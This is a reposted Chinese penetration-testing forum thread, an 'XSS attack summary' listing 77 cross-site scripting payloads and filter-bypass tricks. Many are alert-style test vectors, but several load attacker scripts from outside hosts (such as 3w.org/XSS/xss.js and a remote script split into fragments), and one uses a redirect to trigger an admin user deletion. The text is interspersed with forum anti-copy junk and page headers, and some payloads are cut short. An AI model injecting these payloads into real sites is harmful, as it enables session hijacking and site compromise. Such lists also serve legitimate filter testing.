中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。9 H9 o9 `- Q6 m6 }8 v
(1)普通的XSS JavaScript注入! G0 I0 I4 f, ?5 |) W
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ Q& H' m9 n$ G5 g5 e- W5 `& K- t& d
(2)IMG标签XSS使用JavaScript命令
/ M$ W# Z+ z( Q<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& `# H/ {% Q5 _! X6 n+ p/ `( H
(3)IMG标签无分号无引号5 B) ~5 Z( `% p' K. \/ [
<IMG SRC=javascript:alert(‘XSS’)>
5 d5 e4 w1 F* O0 g* J; v) f(4)IMG标签大小写不敏感
3 x4 d& X  b2 y<IMG SRC=JaVaScRiPt:alert(‘XSS’)>" x6 `! y) r' L9 c8 b1 M' ]" `
(5)HTML编码(必须有分号)9 \. h5 l+ P' h  t% b
<IMG SRC=javascript:alert(“XSS”)>
0 O6 q  e% L$ W3 T" x(6)修正缺陷IMG标签
& d6 U# Z5 h* P. h<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>) H( r& {. R# K$ \3 [6 n

) o( M- K4 X* Q: S
+ B, a3 J$ ]& y+ ^5 [(7)formCharCode标签(计算器)
5 H3 ?- M# o3 H: B- J* i8 Z' b: |  K<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
; D4 R. r# J, Q0 p3 O(8)UTF-8的Unicode编码(计算器)
% v4 K0 B6 a  ^) @) j+ Q* n<IMG SRC=jav..省略..S')>: r  A4 _- n4 w, C6 J' f' k" Y1 K
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)1 ]% t% }9 n5 r9 }% M  o
<IMG SRC=jav..省略..S')># D$ ~7 M, I* I3 U+ j
(10)十六进制编码也是没有分号(计算器)4 w! A9 M9 W6 H1 F  `
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>5 t: k# k9 C6 s9 M5 i, F, _
(11)嵌入式标签,将Javascript分开
9 Y" I8 o* W' K6 K<IMG SRC=”jav ascript:alert(‘XSS’);”>% T& [; x3 K7 p* v+ l3 r$ q8 b
(12)嵌入式编码标签,将Javascript分开
8 ?- n: H8 A, l4 |<IMG SRC=”jav ascript:alert(‘XSS’);”>% ~7 x/ }2 s$ \  Q1 U1 [5 u& h3 Q
(13)嵌入式换行符- ?9 U2 \, U2 k
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 p& b# ]9 Y& b+ Z2 P" E' v4 u
(14)嵌入式回车
& g* U, O# y) l  u# u; B+ k<IMG SRC=”jav ascript:alert(‘XSS’);”>1 U2 D- @/ D4 a1 q. O2 R9 F% D
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
9 s& M1 n9 W- U/ S( p<IMG SRC=”javascript:alert(‘XSS‘)”>
- u* H& K! k+ d3 p(16)解决限制字符(要求同页面)
% i0 j1 `( J7 l: ^, p7 ^<script>z=’document.’</script>
" y4 v; b  X1 L5 ~" U8 O<script>z=z+’write(“‘</script>
1 J& Y. V: t$ a5 |<script>z=z+’<script’</script>+ `& M# S/ T* J0 l  I4 W3 f
<script>z=z+’ src=ht’</script>
( W( [! b0 q9 s+ N8 N' q9 E6 K<script>z=z+’tp://ww’</script>. G3 M" r; m8 T7 g
<script>z=z+’w.shell’</script>4 f; S' Q% l3 [4 _' |8 Z3 x  H
<script>z=z+’.net/1.’</script>
' m/ w5 {7 J+ B) q8 f' C% o<script>z=z+’js></sc’</script>
) J- E4 j% ]7 g  X<script>z=z+’ript>”)’</script>
- v# u( m$ Q8 A* T0 Z  Z* t<script>eval_r(z)</script>
1 k8 a- U# Z' ]9 I) u% K; P9 S(17)空字符12-7-1 T00LS - Powered by Discuz! Board  \6 V$ j& k! \. K' `. h! [3 I, s
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
1 C/ r7 [0 o( e2 P% D5 Jperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
) w4 h+ T, e9 W) U' Q8 j(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 Y6 {+ Q0 ~9 |. V7 C  ~& vperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
# C7 x. L: W. d, Z( Z+ o(19)Spaces和meta前的IMG标签# S5 Z5 Q# X5 s0 U$ ~- F# }
<IMG SRC=” javascript:alert(‘XSS’);”>) O% h1 ~5 W9 T4 {* J8 i8 R
(20)Non-alpha-non-digit XSS
( b2 z0 h$ m" W, J<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! u9 O& N% {( D: R3 i' M6 Y(21)Non-alpha-non-digit XSS to 2
  R2 n4 p% J* |5 z<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
: f' A' z$ E4 T. Q" m(22)Non-alpha-non-digit XSS to 38 N! [! [( h( }& ~* z2 q" m
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>1 i$ ?6 s. R! C
(23)双开括号
: ]9 |- i/ N& @# y<<SCRIPT>alert(“XSS”);//<</SCRIPT>8 `  O4 [2 R7 A9 @& \6 {
(24)无结束脚本标记(仅火狐等浏览器)
/ L$ y$ Z7 D2 g# J! ?( v<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>7 j6 w. W8 V2 }9 Z  J# w, S
(25)无结束脚本标记2
; z  c7 i. _4 |9 B( V<SCRIPT SRC=//3w.org/XSS/xss.js>. E5 _. j% F5 }- P1 z% T7 |# e
(26)半开的HTML/JavaScript XSS
8 }7 Y! a3 m' S4 h2 \" m6 \<IMG SRC=”javascript:alert(‘XSS’)”
& V* l. t/ m0 c(27)双开角括号+ Q4 x1 d5 X' n+ M* I% O8 W- Y' u
<iframe src=http://3w.org/XSS.html <
. O# Y& d1 v4 P3 T  i# `(28)无单引号 双引号 分号
( }+ |7 x$ l% |' ^& L. u1 S<SCRIPT>a=/XSS/* i0 C( Y+ N( w, F9 i
alert(a.source)</SCRIPT>2 N  }2 A& `' n2 S. w2 E3 j
(29)换码过滤的JavaScript, J4 _* `9 j% \; p6 `1 n  d
\”;alert(‘XSS’);//
) n8 f: x; S2 F(30)结束Title标签
. x9 p* [8 e, u* v& H. Q# {</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
# C, I0 o8 f3 c" N) g& S(31)Input Image! ]" l- P9 X0 ?  j* O9 W! B  ~
<INPUT SRC=”javascript:alert(‘XSS’);”>( {& f2 E. ]0 n5 S( I' E( A
(32)BODY Image
6 u. d: G6 \2 K: E" N<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
; b; N9 P  Z( y0 }% T+ T(33)BODY标签  ?: q. T3 Z& o. M2 W
<BODY(‘XSS’)>
4 J( R! z$ C9 a# ^' t# B7 S(34)IMG Dynsrc3 X5 M( ?0 P; U2 M9 I# j
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
  \$ r) L" ]3 M) W(35)IMG Lowsrc( k8 V$ }; K0 ]' P
<IMG LOWSRC=”javascript:alert(‘XSS’)”>1 X" w2 k! y2 A
(36)BGSOUND
$ L3 S: b5 r  N4 p' S$ w3 |<BGSOUND SRC=”javascript:alert(‘XSS’);”>/ n9 n  L4 N9 A+ x( r1 H# [6 ^
(37)STYLE sheet
/ D4 }) w% p  E! R2 \2 F) w6 m2 z<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
7 s- F+ e8 M0 K) P, ^/ N(38)远程样式表5 {3 C% g6 t  l, d
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>% ?1 H6 D) i7 |/ b2 A2 C. t
(39)List-style-image(列表式)
% e, }3 X; L& C% {+ m8 x<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 V* W2 {, |: h* N) V(40)IMG VBscript
  ?2 D4 G  s, N<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS! I" c2 u. ?6 Q7 c8 S! z; g. V
(41)META链接url
9 o, q( P+ B7 }1 I- L" v" W
3 W# `8 T2 k! V* K0 f- t; {6 M6 U$ d6 D$ L( \
<META HTTP-EQUIV=”refresh” CONTENT=”0;" j6 Z1 C$ b; y9 r, V/ \5 p
URL=http://;URL=javascript:alert(‘XSS’);”>
" s/ f0 U! a* T/ H(42)Iframe
/ ?! C& y; L2 K' A<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>! i/ f" B. R9 k8 p' M
(43)Frame2 A3 g& X, S0 ]5 `8 S- ~. {; w
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board) i. ~9 K8 k' f+ P$ j! C
https://www.t00ls.net/viewthread ... table&tid=15267 3/6) M1 b, |( P) P! ^) |
(44)Table) `9 h& B' e1 D: V
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
+ t5 d9 h# B1 e/ M, z% d- x(45)TD
4 I, X  c9 j  r9 D<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
2 u7 F0 B  t9 L' ?7 q4 p. K(46)DIV background-image
; \  L+ D' P0 x5 P: L* ^/ _<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>8 D1 d& F7 c" R( g2 k2 U! v3 B
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
1 Y, a% S0 {5 l. R5 v0 N5 u% r+ o8&13&12288&65279)& L( s7 c6 A5 C/ Z; \% L$ ^
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& \! L& C$ _3 R5 ](48)DIV expression, U3 R+ g& m) r" u, u9 F$ t
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>* p" Z  N" T7 _" ^" j# L7 \
(49)STYLE属性分拆表达
' C5 v0 M( ~; _& F) \5 ^4 W<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
/ x$ Y) q& }1 @! N+ B6 ]" \(50)匿名STYLE(组成:开角号和一个字母开头)
; s7 B( G6 z% n( d3 Y<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
) y; h8 u& c, n% c(51)STYLE background-image2 A; {1 K6 I3 J
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A/ Q/ Y; u7 n2 S
CLASS=XSS></A>' F4 V% J, C5 p' [+ _4 e* z
(52)IMG STYLE方式
8 ^; F; b( c& |7 b( ]9 |4 j( C( Mexppression(alert(“XSS”))’>5 o. h, _2 E' e4 Y# d
(53)STYLE background
! l2 P, W3 M! m9 i+ K( b<STYLE><STYLE1 x# `$ X; l  y" r. L6 r: n+ I: s  ~
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>' t3 g* v3 h1 p) b1 t/ C2 P
(54)BASE
) \% U& @( ~# X<BASE HREF=”javascript:alert(‘XSS’);//”>) b' Z2 U5 W$ x, T9 `
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS* L5 d1 a$ L& |5 p$ j1 y7 e3 ~
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>$ t+ c/ x2 [( Y0 L$ X% ^
(56)在flash中使用ActionScrpt可以混进你XSS的代码
: e5 V: I8 L# d9 N' ja=”get”;- C, s& _$ x( M$ Q0 q. e
b=”URL(\”";
. X6 o- D, b; }' z+ G( S! gc=”javascript:”;- t# O$ x6 \( @1 l  M
d=”alert(‘XSS’);\”)”;! A. Z2 Q) ~* S- c( m
eval_r(a+b+c+d);$ G7 t: B# I# g3 ~2 D  r
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
5 J. D5 R- H7 U" B2 J0 h( W3 t<HTML xmlns:xss>
8 n7 ?% K8 h) U/ Z9 e# W! P<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
. t3 o! T0 k, i. I<xss:xss>XSS</xss:xss>
# M* h* b7 j- k! U' L: e( \! p2 [$ p</HTML>$ X4 s/ L2 h' E  M5 |
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
) I9 q( w$ |7 A  V6 a% S% J<SCRIPT SRC=””></SCRIPT>5 `/ L, s+ `8 r- T& }3 N& h+ E
(59)IMG嵌入式命令,可执行任意命令
& t' `: H4 s8 a& B; P2 l$ \6 U! m<IMG SRC=”http://www.XXX.com/a.php?a=b”>
( O' Y, b) G) [% [- H" M(60)IMG嵌入式命令(a.jpg在同服务器)
, C# X5 i5 C4 t; [Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser/ V& K& k0 D7 `1 e* r/ d  }
(61)绕符号过滤
* J4 _0 n( a* t<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 n# f8 N1 A6 k; l# G! M(62)) v' _" l8 ], T- f3 A5 \
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( e7 I. h: C5 @- W0 j( Z& u7 l(63); f; t2 r. D2 c0 R/ d6 t) ^
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
' Z3 d% ]  d" k! J+ W(64)4 |' T4 T: N( b4 C  ?* {# ]6 D
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>4 x, P* i+ N* ~
(65)
, z6 J; c7 m5 o* ^* S, C5 `" X# @0 ^- ^<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
: D: n! K" W/ g2 k8 v(66)12-7-1 T00LS - Powered by Discuz! Board! ^4 W/ a2 h: d0 d( z/ D; Z
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
/ ]1 e0 r2 l& h; s<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
* V: d+ F: K. a2 k( e" D  a9 J(67)
) Y0 q8 K+ k! H' i. m' |2 |( B<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>& R; j/ r) A  w2 a' D+ M3 M+ l
</SCRIPT>/ K- w  o8 w, W+ ]
(68)URL绕行/ U. |: W0 s+ I, |: ?
<A HREF=”http://127.0.0.1/”>XSS</A>! i1 Q, ^' h1 F( m7 u( e
(69)URL编码, Z: o' Q2 _% v$ }6 e: j/ I  V! O
<A HREF=”http://3w.org”>XSS</A>
7 R* z+ i' T# h5 F+ x9 E. T( s(70)IP十进制& b* F4 G. `% Y- f  R( y
<A HREF=”http://3232235521″>XSS</A>
$ t/ Z" ^% z3 v( m6 ](71)IP十六进制  M6 }" q) C* _& G! w" I' d% i3 V
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>; ~( h$ @: v( u+ A5 }: E" M0 ^9 D
(72)IP八进制' x- @# m5 ]3 B) x7 C+ G
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
! p2 |* @; v" o/ E(73)混合编码
- i- n* b0 e; [  h& S0 p# p' A) c<A HREF=”h
- M0 Q- @7 d4 P* Htt p://6 6.000146.0×7.147/”">XSS</A>
5 H3 L; S# T2 b% a9 j  W  I0 E(74)节省[http:]0 |. t6 `3 _* Y1 ~3 o
<A HREF=”//www.google.com/”>XSS</A>
2 H# A( Q# _8 v- I% Q(75)节省[www]
  }# R7 m( a1 y6 ^& F<A HREF=”http://google.com/”>XSS</A>( o$ S: n5 f& m0 N
(76)绝对点绝对DNS1 q3 \  f' v- k+ X
<A HREF=”http://www.google.com./”>XSS</A>0 P* |; g* \  Z* S6 L( U
(77)javascript链接, ?) K9 B& d1 a- H7 g1 ?. P6 E
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>& }% p" J3 O, ?6 u2 p9 }- Z
" S. d4 o" r1 B
原文地址:http://fuzzexp.org/u/0day/?p=14# I3 a; t' B$ ^& @6 z: B5 A3 s

) ?4 f' d% ~- M  Q6 C( J! G




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2